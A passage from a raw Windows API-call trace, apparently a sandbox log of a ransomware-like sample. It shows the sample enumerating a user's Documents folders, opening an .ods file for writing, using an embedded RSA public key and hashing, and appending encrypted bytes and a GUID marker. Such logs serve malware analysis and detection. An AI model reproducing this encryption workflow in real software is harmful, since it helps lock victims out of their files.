HALPmcxz\\Documents\\My Shapes\\Favorites.vss.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.moss")) returned 1 [0170.333] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.333] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3330 | out: hHeap=0xcd0000) returned 1 [0170.333] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0170.333] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0170.333] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0170.333] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.333] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0170.334] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.334] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.334] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0170.334] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0170.334] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.334] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.334] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.334] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.334] PathFindFileNameW (pszPath="") returned="" [0170.334] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0170.334] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.334] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.334] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0170.334] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.334] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.335] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\") returned="NsI7Q_Ai4cQKUwAhGA5\\" [0170.335] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0170.335] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.335] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.335] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.335] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.335] PathFindFileNameW (pszPath="") returned="" [0170.335] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8472fb0, ftCreationTime.dwHighDateTime=0x1d5e820, ftLastAccessTime.dwLowDateTime=0xfc59de90, ftLastAccessTime.dwHighDateTime=0x1d5e019, ftLastWriteTime.dwLowDateTime=0xfc59de90, ftLastWriteTime.dwHighDateTime=0x1d5e019, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0170.335] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e8c0 | out: hHeap=0xcd0000) returned 1 [0170.335] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8472fb0, ftCreationTime.dwHighDateTime=0x1d5e820, ftLastAccessTime.dwLowDateTime=0xfc59de90, ftLastAccessTime.dwHighDateTime=0x1d5e019, ftLastWriteTime.dwLowDateTime=0xfc59de90, ftLastWriteTime.dwHighDateTime=0x1d5e019, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.335] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d450f60, ftCreationTime.dwHighDateTime=0x1d5e68a, ftLastAccessTime.dwLowDateTime=0xdcdab6e0, ftLastAccessTime.dwHighDateTime=0x1d5e477, ftLastWriteTime.dwLowDateTime=0xdcdab6e0, ftLastWriteTime.dwHighDateTime=0x1d5e477, nFileSizeHigh=0x0, nFileSizeLow=0x4bed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4Dln-6B2CH3Hg4kDacAD.ods", cAlternateFileName="4DLN-6~1.ODS")) returned 1 [0170.335] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\4Dln-6B2CH3Hg4kDacAD.ods") returned=".ods" [0170.335] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\4Dln-6B2CH3Hg4kDacAD.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\4dln-6b2ch3hg4kdacad.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.336] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=19437) returned 1 [0170.336] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.339] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x4bc7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.339] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.340] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x4bed, lpOverlapped=0x0) returned 1 [0170.340] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.340] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.341] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.341] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e8c0) returned 1 [0170.342] CryptCreateHash (in: hProv=0xd2e8c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.342] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.342] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.342] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.342] GetLastError () returned 0x0 [0170.342] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.342] CryptReleaseContext (hProv=0xd2e8c0, dwFlags=0x0) returned 1 [0170.342] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.342] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.342] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.342] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.342] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.342] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.342] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4bf0) returned 0x3b53ea8 [0170.342] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0170.342] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0170.342] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0170.342] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.342] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0170.342] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0170.342] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4c1f0 [0170.342] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc2c0 [0170.342] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4c238 [0170.342] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc2d8 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc308 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc320 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0170.343] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc308 | out: hHeap=0xcd0000) returned 1 [0170.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc320 | out: hHeap=0xcd0000) returned 1 [0170.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0170.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc320 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc308 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa2588 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa26a0 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0170.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0170.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc320 | out: hHeap=0xcd0000) returned 1 [0170.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0170.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc308 | out: hHeap=0xcd0000) returned 1 [0170.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0170.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0170.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0170.344] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0170.344] GetCurrentThreadId () returned 0x324 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b4a2b0 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e8c0 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.344] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.344] GetCurrentThreadId () returned 0x324 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.344] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35ceae8 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.344] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.344] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.344] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0170.344] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0170.344] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0170.344] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc308 [0170.345] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0170.345] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc320 [0170.345] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0170.345] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc2f0 [0170.345] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0170.345] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0170.345] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0170.345] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0170.345] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc338 [0170.345] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0170.345] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0170.345] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0170.345] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0170.345] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0170.345] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc308 | out: hHeap=0xcd0000) returned 1 [0170.346] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc308 [0170.346] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0170.346] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b44ac8 [0170.346] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.346] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0170.346] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.346] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48820 [0170.346] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.346] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x3aa27b8 [0170.346] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x4bed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.346] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.346] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.346] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 